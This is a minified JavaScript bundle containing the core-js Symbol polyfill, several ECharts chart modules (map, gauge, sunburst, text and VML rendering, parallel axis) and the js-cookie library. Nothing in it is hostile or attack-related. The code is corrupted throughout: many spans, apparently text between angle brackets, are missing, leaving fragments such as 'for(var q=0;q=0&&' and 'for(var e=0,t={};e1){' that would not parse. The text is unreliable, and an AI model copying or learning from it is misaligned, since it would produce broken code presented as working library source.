F(i,(function(t){s&&!he.call(n,t)||le(e,t,n[t])})),e},ce=function(e,t){return void 0===t?_(e):ue(_(e),t)},he=function(e){var t=v(e,!0),n=K.call(this,t);return!(this===W&&h(J,t)&&!h(Q,t))&&(!(n||!h(this,t)||!h(J,t)||h(this,V)&&this[V][t])||n)},de=function(e,t){var n=m(e),i=v(t,!0);if(n!==W||!h(J,i)||h(Q,i)){var r=Z(n,i);return!r||!h(J,i)||h(n,V)&&n[V][i]||(r.enumerable=!0),r}},fe=function(e){var t=X(m(e)),n=[];return F(t,(function(e){h(J,e)||h(L,e)||n.push(e)})),n},pe=function(e){var t=e===W,n=X(t?Q:m(e)),i=[];return F(n,(function(e){!h(J,e)||t&&!h(W,e)||i.push(J[e])})),i};if(l||($=function(){if(this instanceof $)throw TypeError("Symbol is not a constructor");var e=arguments.length&&void 0!==arguments[0]?String(arguments[0]):void 0,t=E(e),n=function(e){this===W&&n.call(Q,e),h(this,V)&&h(this[V],t)&&(this[V][t]=!1),oe(this,t,y(1,e))};return s&&re&&oe(W,t,{configurable:!0,set:n}),ae(t,e)},T($[j],"toString",(function(){return G(this).tag})),T($,"withoutSetter",(function(e){return ae(E(e),e)})),A.f=he,M.f=le,S.f=de,x.f=w.f=fe,k.f=pe,P.f=function(e){return ae(O(e),e)},s&&(Y($[j],"description",{configurable:!0,get:function(){return G(this).description}}),a||T(W,"propertyIsEnumerable",he,{unsafe:!0}))),i({global:!0,wrap:!0,forced:!l,sham:!l},{Symbol:$}),F(b(ne),(function(e){R(e)})),i({target:B,stat:!0,forced:!l},{for:function(e){var t=String(e);if(h(ee,t))return ee[t];var n=$(t);return ee[t]=n,te[n]=t,n},keyFor:function(e){if(!se(e))throw TypeError(e+" is not a symbol");if(h(te,e))return te[e]},useSetter:function(){re=!0},useSimple:function(){re=!1}}),i({target:"Object",stat:!0,forced:!l,sham:!s},{create:ce,defineProperty:le,defineProperties:ue,getOwnPropertyDescriptor:de}),i({target:"Object",stat:!0,forced:!l},{getOwnPropertyNames:fe,getOwnPropertySymbols:pe}),i({target:"Object",stat:!0,forced:c((function(){k.f(1)}))},{getOwnPropertySymbols:function(e){return k.f(g(e))}}),U){var ge=!l||c((function(){var e=$();return"[null]"!=U([e])||"{}"!=U({a:e})||"{}"!=U(Object(e))}));i({target:"JSON",stat:!0,forced:ge},{stringify:function(e,t,n){var i,r=[e],o=1;while(arguments.length>o)r.push(arguments[o++]);if(i=t,(f(t)||void 0!==e)&&!se(e))return d(t)||(t=function(e,t){if("function"==typeof i&&(t=i.call(this,e,t)),!se(t))return t}),r[1]=t,U.apply(null,r)}})}$[j][H]||C($[j],H,$[j].valueOf),N($,B),L[V]=!0},a4fe:function(e,t,n){var i=n("3eba"),r="\0_ec_interaction_mutex";function o(e,t,n){var i=l(e);i[t]=n}function a(e,t,n){var i=l(e),r=i[t];r===n&&(i[t]=null)}function s(e,t){return!!l(e)[t]}function l(e){return e[r]||(e[r]={})}i.registerAction({type:"takeGlobalCursor",event:"globalCursorTaken",update:"update"},(function(){})),t.take=o,t.release=a,t.isTaken=s},a5d8:function(e,t,n){},a630:function(e,t,n){var i=n("23e7"),r=n("4df4"),o=n("1c7e"),a=!o((function(e){Array.from(e)}));i({target:"Array",stat:!0,forced:a},{from:r})},a640:function(e,t,n){"use strict";var i=n("d039");e.exports=function(e,t){var n=[][e];return!!n&&i((function(){n.call(null,t||function(){throw 1},1)}))}},a666:function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("2306"),a=n("0c41"),s="__seriesMapHighDown",l="__seriesMapCallKey",u=i.extendChartView({type:"map",render:function(e,t,n,i){if(!i||"mapToggleSelect"!==i.type||i.from!==this.uid){var r=this.group;if(r.removeAll(),!e.getHostGeoModel()){if(i&&"geoRoam"===i.type&&"series"===i.componentType&&i.seriesId===e.id){o=this._mapDraw;o&&r.add(o.group)}else if(e.needsDrawMap){var o=this._mapDraw||new a(n,!0);r.add(o.group),o.draw(e,t,n,this,i),this._mapDraw=o}else this._mapDraw&&this._mapDraw.remove(),this._mapDraw=null;e.get("showLegendSymbol")&&t.getComponent("legend")&&this._renderSymbols(e,t,n)}}},remove:function(){this._mapDraw&&this._mapDraw.remove(),this._mapDraw=null,this.group.removeAll()},dispose:function(){this._mapDraw&&this._mapDraw.remove(),this._mapDraw=null},_renderSymbols:function(e,t,n){var i=e.originalData,a=this.group;i.each(i.mapDimension("value"),(function(t,n){if(!isNaN(t)){var u=i.getItemLayout(n);if(u&&u.point){var d=u.point,f=u.offset,p=new o.Circle({style:{fill:e.getData().getVisual("color")},shape:{cx:d[0]+9*f,cy:d[1],r:3},silent:!0,z2:8+(f?0:o.Z2_EMPHASIS_LIFT+1)});if(!f){var g=e.mainSeries.getData(),m=i.getName(n),v=g.indexOfName(m),y=i.getItemModel(n),_=y.getModel("label"),b=y.getModel("emphasis.label"),x=g.getItemGraphicEl(v),w=r.retrieve2(e.getFormattedLabel(v,"normal"),m),k=r.retrieve2(e.getFormattedLabel(v,"emphasis"),w),S=x[s],M=Math.random();if(!S){S=x[s]={};var A=r.curry(c,!0),C=r.curry(c,!1);x.on("mouseover",A).on("mouseout",C).on("emphasis",A).on("normal",C)}x[l]=M,r.extend(S,{recordVersion:M,circle:p,labelModel:_,hoverLabelModel:b,emphasisText:k,normalText:w}),h(S,!1)}a.add(p)}}}))}});function c(e){var t=this[s];t&&t.recordVersion===this[l]&&h(t,e)}function h(e,t){var n=e.circle,i=e.labelModel,r=e.hoverLabelModel,a=e.emphasisText,s=e.normalText;t?(n.style.extendFrom(o.setTextStyle({},r,{text:r.get("show")?a:null},{isRectText:!0,useInsideStyle:!1},!0)),n.__mapOriginalZ2=n.z2,n.z2+=o.Z2_EMPHASIS_LIFT):(o.setTextStyle(n.style,i,{text:i.get("show")?s:null,textPosition:i.getShallow("position")||"bottom"},{isRectText:!0,useInsideStyle:!1}),n.dirty(!1),null!=n.__mapOriginalZ2&&(n.z2=n.__mapOriginalZ2,n.__mapOriginalZ2=null))}e.exports=u},a691:function(e,t){var n=Math.ceil,i=Math.floor;e.exports=function(e){return isNaN(e=+e)?0:(e>0?i:n)(e)}},a73c:function(e,t,n){var i=n("6d8b"),r=i.retrieve2,o=i.retrieve3,a=i.each,s=i.normalizeCssArray,l=i.isString,u=i.isObject,c=n("e86a"),h=n("5693"),d=n("5e76"),f=n("7d6d"),p=n("82eb"),g=p.ContextCachedBy,m=p.WILL_BE_RESTORED,v=c.DEFAULT_FONT,y={left:1,right:1,center:1},_={top:1,bottom:1,middle:1},b=[["textShadowBlur","shadowBlur",0],["textShadowOffsetX","shadowOffsetX",0],["textShadowOffsetY","shadowOffsetY",0],["textShadowColor","shadowColor","transparent"]],x={},w={};function k(e){return S(e),a(e.rich,S),e}function S(e){if(e){e.font=c.makeFont(e);var t=e.textAlign;"middle"===t&&(t="center"),e.textAlign=null==t||y[t]?t:"left";var n=e.textVerticalAlign||e.textBaseline;"center"===n&&(n="middle"),e.textVerticalAlign=null==n||_[n]?n:"top";var i=e.textPadding;i&&(e.textPadding=s(e.textPadding))}}function M(e,t,n,i,r,o){i.rich?C(e,t,n,i,r,o):A(e,t,n,i,r,o)}function A(e,t,n,i,r,o){"use strict";var a,s=L(i),l=!1,u=t.__attrCachedBy===g.PLAIN_TEXT;o!==m?(o&&(a=o.style,l=!s&&u&&a),t.__attrCachedBy=s?g.NONE:g.PLAIN_TEXT):u&&(t.__attrCachedBy=g.NONE);var h=i.font||v;l&&h===(a.font||v)||(t.font=h);var d=e.__computedFont;e.__styleFont!==h&&(e.__styleFont=h,d=e.__computedFont=t.font);var p=i.textPadding,y=i.textLineHeight,_=e.__textCotentBlock;_&&!e.__dirtyText||(_=e.__textCotentBlock=c.parsePlainText(n,d,p,y,i.truncate));var x=_.outerHeight,k=_.lines,S=_.lineHeight,M=P(w,e,i,r),A=M.baseX,C=M.baseY,T=M.textAlign||"left",D=M.textVerticalAlign;I(t,i,r,A,C);var O=c.adjustTextY(C,x,D),R=A,F=O;if(s||p){var B=c.getWidth(n,d),j=B;p&&(j+=p[1]+p[3]);var H=c.adjustTextX(A,j,T);s&&E(e,t,i,H,O,j,x),p&&(R=V(A,T,p),F+=p[0])}t.textAlign=T,t.textBaseline="middle",t.globalAlpha=i.opacity||1;for(var q=0;q=0&&(x=S[N],"right"===x.textAlign))D(e,t,x,i,A,y,R,"right"),C-=x.width,R-=x.width,N--;O+=(o-(O-v)-(_-R)-C)/2;while(T<=N)x=S[T],D(e,t,x,i,A,y,O+x.width/2,"center"),O+=x.width,T++;y+=A}}function I(e,t,n,i,r){if(n&&t.textRotation){var o=t.textOrigin;"center"===o?(i=n.width/2+n.x,r=n.height/2+n.y):o&&(i=o[0]+n.x,r=o[1]+n.y),e.translate(i,r),e.rotate(-t.textRotation),e.translate(-i,-r)}}function D(e,t,n,i,a,s,l,u){var c=i.rich[n.styleName]||{};c.text=n.text;var h=n.textVerticalAlign,d=s+a/2;"top"===h?d=s+n.height/2:"bottom"===h&&(d=s+a-n.height/2),!n.isLineHolder&&L(c)&&E(e,t,c,"right"===u?l-n.width:"center"===u?l-n.width/2:l,d-n.height/2,n.width,n.height);var f=n.textPadding;f&&(l=V(l,u,f),d-=n.height/2-f[2]-n.textHeight/2),R(t,"shadowBlur",o(c.textShadowBlur,i.textShadowBlur,0)),R(t,"shadowColor",c.textShadowColor||i.textShadowColor||"transparent"),R(t,"shadowOffsetX",o(c.textShadowOffsetX,i.textShadowOffsetX,0)),R(t,"shadowOffsetY",o(c.textShadowOffsetY,i.textShadowOffsetY,0)),R(t,"textAlign",u),R(t,"textBaseline","middle"),R(t,"font",n.font||v);var p=N(c.textStroke||i.textStroke,m),g=z(c.textFill||i.textFill),m=r(c.textStrokeWidth,i.textStrokeWidth);p&&(R(t,"lineWidth",m),R(t,"strokeStyle",p),t.strokeText(n.text,l,d)),g&&(R(t,"fillStyle",g),t.fillText(n.text,l,d))}function L(e){return!!(e.textBackgroundColor||e.textBorderWidth&&e.textBorderColor)}function E(e,t,n,i,r,o,a){var s=n.textBackgroundColor,c=n.textBorderWidth,f=n.textBorderColor,p=l(s);if(R(t,"shadowBlur",n.textBoxShadowBlur||0),R(t,"shadowColor",n.textBoxShadowColor||"transparent"),R(t,"shadowOffsetX",n.textBoxShadowOffsetX||0),R(t,"shadowOffsetY",n.textBoxShadowOffsetY||0),p||c&&f){t.beginPath();var g=n.textBorderRadius;g?h.buildPath(t,{x:i,y:r,width:o,height:a,r:g}):t.rect(i,r,o,a),t.closePath()}if(p)if(R(t,"fillStyle",s),null!=n.fillOpacity){var m=t.globalAlpha;t.globalAlpha=n.fillOpacity*n.opacity,t.fill(),t.globalAlpha=m}else t.fill();else if(u(s)){var v=s.image;v=d.createOrUpdateImage(v,null,e,O,s),v&&d.isImageReady(v)&&t.drawImage(v,i,r,o,a)}if(c&&f)if(R(t,"lineWidth",c),R(t,"strokeStyle",f),null!=n.strokeOpacity){m=t.globalAlpha;t.globalAlpha=n.strokeOpacity*n.opacity,t.stroke(),t.globalAlpha=m}else t.stroke()}function O(e,t){t.image=e}function P(e,t,n,i){var r=n.x||0,o=n.y||0,a=n.textAlign,s=n.textVerticalAlign;if(i){var l=n.textPosition;if(l instanceof Array)r=i.x+F(l[0],i.width),o=i.y+F(l[1],i.height);else{var u=t&&t.calculateTextPosition?t.calculateTextPosition(x,n,i):c.calculateTextPosition(x,n,i);r=u.x,o=u.y,a=a||u.textAlign,s=s||u.textVerticalAlign}var h=n.textOffset;h&&(r+=h[0],o+=h[1])}return e=e||{},e.baseX=r,e.baseY=o,e.textAlign=a,e.textVerticalAlign=s,e}function R(e,t,n){return e[t]=f(e,t,n),e[t]}function N(e,t){return null==e||t<=0||"transparent"===e||"none"===e?null:e.image||e.colorStops?"#000":e}function z(e){return null==e||"none"===e?null:e.image||e.colorStops?"#000":e}function F(e,t){return"string"===typeof e?e.lastIndexOf("%")>=0?parseFloat(e)/100*t:parseFloat(e):e}function V(e,t,n){return"right"===t?e-n[1]:"center"===t?e+n[3]/2-n[1]/2:e+n[3]}function B(e,t){return null!=e&&(e||t.textBackgroundColor||t.textBorderWidth&&t.textBorderColor||t.textPadding)}t.normalizeTextStyle=k,t.renderText=M,t.getBoxPosition=P,t.getStroke=N,t.getFill=z,t.parsePercent=F,t.needDrawText=B},a753:function(e,t,n){var i=n("1f0e"),r=n("2306"),o=n("e887"),a=n("3842"),s=a.parsePercent,l=a.round,u=a.linearMap;function c(e,t){var n=e.get("center"),i=t.getWidth(),r=t.getHeight(),o=Math.min(i,r),a=s(n[0],t.getWidth()),l=s(n[1],t.getHeight()),u=s(e.get("radius"),o/2);return{cx:a,cy:l,r:u}}function h(e,t){return t&&("string"===typeof t?e=t.replace("{value}",null!=e?e:""):"function"===typeof t&&(e=t(e))),e}var d=2*Math.PI,f=o.extend({type:"gauge",render:function(e,t,n){this.group.removeAll();var i=e.get("axisLine.lineStyle.color"),r=c(e,n);this._renderMain(e,t,n,i,r)},dispose:function(){},_renderMain:function(e,t,n,i,o){for(var a=this.group,s=e.getModel("axisLine"),l=s.getModel("lineStyle"),u=e.get("clockwise"),c=-e.get("startAngle")/180*Math.PI,h=-e.get("endAngle")/180*Math.PI,f=(h-c)%d,p=c,g=l.get("width"),m=s.get("show"),v=0;m&&v=e&&(0===t?0:i[t-1][0]).4?"bottom":"middle",textAlign:L<-.4?"left":L>.4?"right":"center"},{autoColor:N}),silent:!0}))}if(_.get("show")&&D!==x){for(var z=0;z<=w;z++){L=Math.cos(M),E=Math.sin(M);var F=new r.Line({shape:{x1:L*g+f,y1:E*g+p,x2:L*(g-S)+f,y2:E*(g-S)+p},silent:!0,style:I});"auto"===I.stroke&&F.setStyle({stroke:i((D+z/w)/x)}),d.add(F),M+=C}M-=C}else M+=A}},_renderPointer:function(e,t,n,o,a,l,c,h){var d=this.group,f=this._data;if(e.get("pointer.show")){var p=[+e.get("min"),+e.get("max")],g=[l,c],m=e.getData(),v=m.mapDimension("value");m.diff(f).add((function(t){var n=new i({shape:{angle:l}});r.initProps(n,{shape:{angle:u(m.get(v,t),p,g,!0)}},e),d.add(n),m.setItemGraphicEl(t,n)})).update((function(t,n){var i=f.getItemGraphicEl(n);r.updateProps(i,{shape:{angle:u(m.get(v,t),p,g,!0)}},e),d.add(i),m.setItemGraphicEl(t,i)})).remove((function(e){var t=f.getItemGraphicEl(e);d.remove(t)})).execute(),m.eachItemGraphicEl((function(e,t){var n=m.getItemModel(t),i=n.getModel("pointer");e.setShape({x:a.cx,y:a.cy,width:s(i.get("width"),a.r),r:s(i.get("length"),a.r)}),e.useStyle(n.getModel("itemStyle").getItemStyle()),"auto"===e.style.fill&&e.setStyle("fill",o(u(m.get(v,t),p,[0,1],!0))),r.setHoverStyle(e,n.getModel("emphasis.itemStyle").getItemStyle())})),this._data=m}else f&&f.eachItemGraphicEl((function(e){d.remove(e)}))},_renderTitle:function(e,t,n,i,o){var a=e.getData(),l=a.mapDimension("value"),c=e.getModel("title");if(c.get("show")){var h=c.get("offsetCenter"),d=o.cx+s(h[0],o.r),f=o.cy+s(h[1],o.r),p=+e.get("min"),g=+e.get("max"),m=e.getData().get(l,0),v=i(u(m,[p,g],[0,1],!0));this.group.add(new r.Text({silent:!0,style:r.setTextStyle({},c,{x:d,y:f,text:a.getName(0),textAlign:"center",textVerticalAlign:"middle"},{autoColor:v,forceRich:!0})}))}},_renderDetail:function(e,t,n,i,o){var a=e.getModel("detail"),l=+e.get("min"),c=+e.get("max");if(a.get("show")){var d=a.get("offsetCenter"),f=o.cx+s(d[0],o.r),p=o.cy+s(d[1],o.r),g=s(a.get("width"),o.r),m=s(a.get("height"),o.r),v=e.getData(),y=v.get(v.mapDimension("value"),0),_=i(u(y,[l,c],[0,1],!0));this.group.add(new r.Text({silent:!0,style:r.setTextStyle({},a,{x:f,y:p,text:h(y,a.get("formatter")),textWidth:isNaN(g)?null:g,textHeight:isNaN(m)?null:m,textAlign:"center",textVerticalAlign:"middle"},{autoColor:_,forceRich:!0})}))}}}),p=f;e.exports=p},a78e:function(e,t,n){var i,r; +/*! + * JavaScript Cookie v2.2.0 + * https://github.com/js-cookie/js-cookie + * + * Copyright 2006, 2015 Klaus Hartl & Fagner Brack + * Released under the MIT license + */(function(o){var a=!1;if(i=o,r="function"===typeof i?i.call(t,n,t,e):i,void 0===r||(e.exports=r),a=!0,e.exports=o(),a=!0,!a){var s=window.Cookies,l=window.Cookies=o();l.noConflict=function(){return window.Cookies=s,l}}})((function(){function e(){for(var e=0,t={};e1){if(o=e({path:"/"},i.defaults,o),"number"===typeof o.expires){var s=new Date;s.setMilliseconds(s.getMilliseconds()+864e5*o.expires),o.expires=s}o.expires=o.expires?o.expires.toUTCString():"";try{a=JSON.stringify(r),/^[\{\[]/.test(a)&&(r=a)}catch(m){}r=n.write?n.write(r,t):encodeURIComponent(String(r)).replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g,decodeURIComponent),t=encodeURIComponent(String(t)),t=t.replace(/%(23|24|26|2B|5E|60|7C)/g,decodeURIComponent),t=t.replace(/[\(\)]/g,escape);var l="";for(var u in o)o[u]&&(l+="; "+u,!0!==o[u]&&(l+="="+o[u]));return document.cookie=t+"="+r+l}t||(a={});for(var c=document.cookie?document.cookie.split("; "):[],h=/(%[0-9A-Z]{2})+/g,d=0;d=2){var E=A[0][0],O=A[1][0],P=A[0][1]*t.opacity,R=A[1][1]*t.opacity;e.type=r,e.method="none",e.focus="100%",e.angle=a,e.color=E,e.color2=O,e.colors=T.join(","),e.opacity=R,e.opacity2=P}"radial"===r&&(e.focusposition=s.join(","))}else F(e,i,t.opacity)},j=function(e,t){t.lineDash&&(e.dashstyle=t.lineDash.join(" ")),null==t.stroke||t.stroke instanceof m||F(e,t.stroke,t.opacity)},H=function(e,t,n,i){var r="fill"===t,o=e.getElementsByTagName(t)[0];null!=n[t]&&"none"!==n[t]&&(r||!r&&n.lineWidth)?(e[r?"filled":"stroked"]="true",n[t]instanceof m&&R(e,o),o||(o=v.createNode(t)),r?B(o,n,i):j(o,n),P(e,o)):(e[r?"filled":"stroked"]="false",R(e,o))},q=[[],[],[]],G=function(e,t){var n,i,r,a,s,l,u=y.M,c=y.C,h=y.L,d=y.A,f=y.Q,p=[],g=e.data,m=e.len();for(a=0;a.01?H&&(G+=270/C):Math.abs(W-z)<1e-4?H&&GN?A-=270/C:A+=270/C:H&&Wz?S+=270/C:S-=270/C),p.push($,_(((N-F)*O+L)*C-T),M,_(((z-V)*P+E)*C-T),M,_(((N+F)*O+L)*C-T),M,_(((z+V)*P+E)*C-T),M,_((G*O+L)*C-T),M,_((W*P+E)*C-T),M,_((S*O+L)*C-T),M,_((A*P+E)*C-T)),s=S,l=A;break;case y.R:var U=q[0],Z=q[1];U[0]=g[a++],U[1]=g[a++],Z[0]=U[0]+g[a++],Z[1]=U[1]+g[a++],t&&(o(U,U,t),o(Z,Z,t)),U[0]=_(U[0]*C-T),Z[0]=_(Z[0]*C-T),U[1]=_(U[1]*C-T),Z[1]=_(Z[1]*C-T),p.push(" m ",U[0],M,U[1]," l ",Z[0],M,U[1]," l ",Z[0],M,Z[1]," l ",U[0],M,Z[1]);break;case y.Z:p.push(" x ")}if(n>0){p.push(i);for(var Y=0;YX&&(Y=0,Z={});var n,i=K.style;try{i.font=e,n=i.fontFamily.split(",")[0]}catch(r){}t={style:i.fontStyle||U,variant:i.fontVariant||U,weight:i.fontWeight||U,size:0|parseFloat(i.fontSize||12),family:n||"Microsoft YaHei"},Z[e]=t,Y++}return t};l.$override("measureText",(function(e,t){var n=v.doc;$||($=n.createElement("div"),$.style.cssText="position:absolute;top:-20000px;left:0;padding:0;margin:0;border:none;white-space:pre;",v.doc.body.appendChild($));try{$.style.font=t}catch(i){}return $.innerHTML="",$.appendChild(n.createTextNode(e)),{width:$.offsetWidth}}));for(var Q=new a,ee=function(e,t,n,i){var r=this.style;this.__dirty&&u.normalizeTextStyle(r,!0);var a=r.text;if(null!=a&&(a+=""),a){if(r.rich){var s=l.parseRichText(a,r);a=[];for(var c=0;cf?f=g:(p.lastTickCount=o,p.lastAutoInterval=f),f}},i.inherits(u,o);var c=u;e.exports=c},aa01:function(e,t,n){var i=n("6d8b"),r=n("4f85"),o=n("06c7"),a=n("4319"),s=n("55ac"),l=s.wrapTreePathInfo,u=r.extend({type:"series.sunburst",_viewRoot:null,getInitialData:function(e,t){var n={name:e.name,children:e.data};c(n);var r=i.map(e.levels||[],(function(e){return new a(e,this,t)}),this),s=o.createTree(n,this,l);function l(e){e.wrapMethod("getItemModel",(function(e,t){var n=s.getNodeByDataIndex(t),i=r[n.depth];return i&&(e.parentModel=i),e}))}return s.data},optionUpdated:function(){this.resetViewRoot()},getDataParams:function(e){var t=r.prototype.getDataParams.apply(this,arguments),n=this.getData().tree.getNodeByDataIndex(e);return t.treePathInfo=l(n,this),t},defaultOption:{zlevel:0,z:2,center:["50%","50%"],radius:[0,"75%"],clockwise:!0,startAngle:90,minAngle:0,percentPrecision:2,stillShowZeroSum:!0,highlightPolicy:"descendant",nodeClick:"rootToNode",renderLabelForZeroData:!1,label:{rotate:"radial",show:!0,opacity:1,align:"center",position:"inside",distance:5,silent:!0},itemStyle:{borderWidth:1,borderColor:"white",borderType:"solid",shadowBlur:0,shadowColor:"rgba(0, 0, 0, 0.2)",shadowOffsetX:0,shadowOffsetY:0,opacity:1},highlight:{itemStyle:{opacity:1}},downplay:{itemStyle:{opacity:.5},label:{opacity:.6}},animationType:"expansion",animationDuration:1e3,animationDurationUpdate:500,animationEasing:"cubicOut",data:[],levels:[],sort:"desc"},getViewRoot:function(){return this._viewRoot},resetViewRoot:function(e){e?this._viewRoot=e:e=this._viewRoot;var t=this.getRawData().tree.root;e&&(e===t||t.contains(e))||(this._viewRoot=t)}});function c(e){var t=0;i.each(e.children,(function(e){c(e);var n=e.value;i.isArray(n)&&(n=n[0]),t+=n}));var n=e.value;i.isArray(n)&&(n=n[0]),(null==n||isNaN(n))&&(n=t),n<0&&(n=0),i.isArray(e.value)?e.value[0]=n:e.value=n}e.exports=u},aa3e:function(e,t,n){var i=n("6d8b");function r(e,t){return t=t||[0,0],i.map(["x","y"],(function(n,i){var r=this.getAxis(n),o=t[i],a=e[i]/2;return"category"===r.type?r.getBandWidth():Math.abs(r.dataToCoord(o-a)-r.dataToCoord(o+a))}),this)}function o(e){var t=e.grid.getRect();return{coordSys:{type:"cartesian2d",x:t.x,y:t.y,width:t.width,height:t.height},api:{coord:function(t){return e.dataToPoint(t)},size:i.bind(r,e)}}}e.exports=o},aadf:function(e,t,n){var i=n("3eba"),r=n("6d8b");n("5aa9"),n("d6d9"),n("3329");var o=n("9d57"),a=o.layout,s=n("7f96");n("01ed"),i.registerLayout(r.curry(a,"pictorialBar")),i.registerVisual(s("pictorialBar","roundRect"))},ab05:function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("2b8c"),a=n("5f14"),s=i.PRIORITY.VISUAL.COMPONENT;function l(e,t,n,i){for(var r=t.targetVisuals[i],o=a.prepareVisualTypes(r),s={color:e.getData().getVisual("color")},l=0,u=o.length;l1e4||!this._symbolDraw.isPersistent())return{update:!0};var r=a().reset(e);r.progress&&r.progress({start:0,end:i.count()},i),this._symbolDraw.updateLayout(i)},_getClipShape:function(e){var t=e.coordinateSystem,n=t&&t.getArea&&t.getArea();return e.get("clip",!0)?n:null},_updateSymbolDraw:function(e,t){var n=this._symbolDraw,i=t.pipelineContext,a=i.large;return n&&a===this._isLargeDraw||(n&&n.remove(),n=this._symbolDraw=a?new o:new r,this._isLargeDraw=a,this.group.removeAll()),this.group.add(n.group),n},remove:function(e,t){this._symbolDraw&&this._symbolDraw.remove(!0),this._symbolDraw=null},dispose:function(){}})},ac0f:function(e,t,n){var i=n("cbe5"),r=n("401b"),o=n("4a3f"),a=o.quadraticSubdivide,s=o.cubicSubdivide,l=o.quadraticAt,u=o.cubicAt,c=o.quadraticDerivativeAt,h=o.cubicDerivativeAt,d=[];function f(e,t,n){var i=e.cpx2,r=e.cpy2;return null===i||null===r?[(n?h:u)(e.x1,e.cpx1,e.cpx2,e.x2,t),(n?h:u)(e.y1,e.cpy1,e.cpy2,e.y2,t)]:[(n?c:l)(e.x1,e.cpx1,e.x2,t),(n?c:l)(e.y1,e.cpy1,e.y2,t)]}var p=i.extend({type:"bezier-curve",shape:{x1:0,y1:0,x2:0,y2:0,cpx1:0,cpy1:0,percent:1},style:{stroke:"#000",fill:null},buildPath:function(e,t){var n=t.x1,i=t.y1,r=t.x2,o=t.y2,l=t.cpx1,u=t.cpy1,c=t.cpx2,h=t.cpy2,f=t.percent;0!==f&&(e.moveTo(n,i),null==c||null==h?(f<1&&(a(n,l,r,f,d),l=d[1],r=d[2],a(i,u,o,f,d),u=d[1],o=d[2]),e.quadraticCurveTo(l,u,r,o)):(f<1&&(s(n,l,c,r,f,d),l=d[1],c=d[2],r=d[3],s(i,u,h,o,f,d),u=d[1],h=d[2],o=d[3]),e.bezierCurveTo(l,u,c,h,r,o)))},pointAt:function(e){return f(this.shape,e,!1)},tangentAt:function(e){var t=f(this.shape,e,!0);return r.normalize(t,t)}});e.exports=p},ac1f:function(e,t,n){"use strict";var i=n("23e7"),r=n("9263");i({target:"RegExp",proto:!0,forced:/./.exec!==r},{exec:r})},ad6d:function(e,t,n){"use strict";var i=n("825a");e.exports=function(){var e=i(this),t="";return e.global&&(t+="g"),e.ignoreCase&&(t+="i"),e.multiline&&(t+="m"),e.dotAll&&(t+="s"),e.unicode&&(t+="u"),e.sticky&&(t+="y"),t}},adda:function(e,t,n){var i=n("94e4"),r=i.circularLayout;function o(e){e.eachSeriesByType("graph",(function(e){"circular"===e.get("layout")&&r(e,"symbolSize")}))}e.exports=o},ade3:function(e,t,n){"use strict";function i(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}n.d(t,"a",(function(){return i}))},adf4:function(e,t,n){var i=n("4f85"),r=n("b1d4"),o=n("2f45"),a=o.getDimensionTypeByAxis,s=n("6179"),l=n("6d8b"),u=n("e0d3"),c=u.groupData,h=n("eda2"),d=h.encodeHTML,f=n("c4a3"),p=2,g=i.extend({type:"series.themeRiver",dependencies:["singleAxis"],nameMap:null,init:function(e){g.superApply(this,"init",arguments),this.legendVisualProvider=new f(l.bind(this.getData,this),l.bind(this.getRawData,this))},fixData:function(e){var t=e.length,n={},i=c(e,(function(e){return n.hasOwnProperty(e[0])||(n[e[0]]=-1),e[2]})),r=[];i.buckets.each((function(e,t){r.push({name:t,dataList:e})}));for(var o=r.length,a=0;a=0&&(this.delFromStorage(e),this._roots.splice(a,1),e instanceof o&&e.delChildrenFromStorage(this))}},addToStorage:function(e){return e&&(e.__storage=this,e.dirty(!1)),this},delFromStorage:function(e){return e&&(e.__storage=null),this},dispose:function(){this._renderList=this._roots=null},displayableSortFunc:s};var u=l;e.exports=u},b006:function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("fab2"),a=n("fc82"),s=n("f4a2"),l=n("2306"),u=["axisLine","axisTickLabel","axisName"],c=i.extendComponentView({type:"parallelAxis",init:function(e,t){c.superApply(this,"init",arguments),(this._brushController=new a(t.getZr())).on("brush",r.bind(this._onBrush,this))},render:function(e,t,n,i){if(!h(e,t,i)){this.axisModel=e,this.api=n,this.group.removeAll();var a=this._axisGroup;if(this._axisGroup=new l.Group,this.group.add(this._axisGroup),e.get("show")){var s=f(e,t),c=s.coordinateSystem,d=e.getAreaSelectStyle(),p=d.width,g=e.axis.dim,m=c.getAxisLayout(g),v=r.extend({strokeContainThreshold:p},m),y=new o(e,v);r.each(u,y.add,y),this._axisGroup.add(y.getGroup()),this._refreshBrushController(v,d,e,s,p,n);var _=i&&!1===i.animation?null:e;l.groupTransition(a,this._axisGroup,_)}}},_refreshBrushController:function(e,t,n,i,r,o){var a=n.axis.getExtent(),u=a[1]-a[0],c=Math.min(30,.1*Math.abs(u)),h=l.BoundingRect.create({x:a[0],y:-r/2,width:u,height:r});h.x-=c,h.width+=2*c,this._brushController.mount({enableGlobalPan:!0,rotation:e.rotation,position:e.position}).setPanels([{panelId:"pl",clipPath:s.makeRectPanelClipPath(h),isTargetByCursor:s.makeRectIsTargetByCursor(h,o,i),getLinearBrushOtherExtent:s.makeLinearBrushOtherExtent(h,0)}]).enableBrush({brushType:"lineX",brushStyle:t,removeOnClick:!0}).updateCovers(d(n))},_onBrush:function(e,t){var n=this.axisModel,i=n.axis,o=r.map(e,(function(e){return[i.coordToData(e.range[0],!0),i.coordToData(e.range[1],!0)]}));(!n.option.realtime===t.isEnd||t.removeOnClick)&&this.api.dispatchAction({type:"axisAreaSelect",parallelAxisId:n.id,intervals:o})},dispose:function(){this._brushController.dispose()}});function h(e,t,n){return n&&"axisAreaSelect"===n.type&&t.findComponents({mainType:"parallelAxis",query:n})[0]===e}function d(e){var t=e.axis;return r.map(e.activeIntervals,(function(e){return{brushType:"lineX",panelId:"pl",range:[t.dataToCoord(e[0],!0),t.dataToCoord(e[1],!0)]}}))}function f(e,t){return t.getComponent("parallel",e.get("parallelIndex"))}var p=c;e.exports=p},b041:function(e,t,n){"use strict";var i=n("00ee"),r=n("f5df");e.exports=i?{}.toString:function(){return"[object "+r(this)+"]"}},b0af:function(e,t,n){var i=n("2306"),r=n("3842"),o=r.round;function a(e,t,n){var r=e.getArea(),o=e.getBaseAxis().isHorizontal(),a=r.x,s=r.y,l=r.width,u=r.height,c=n.get("lineStyle.width")||2;a-=c/2,s-=c/2,l+=c,u+=c,a=Math.floor(a),l=Math.round(l);var h=new 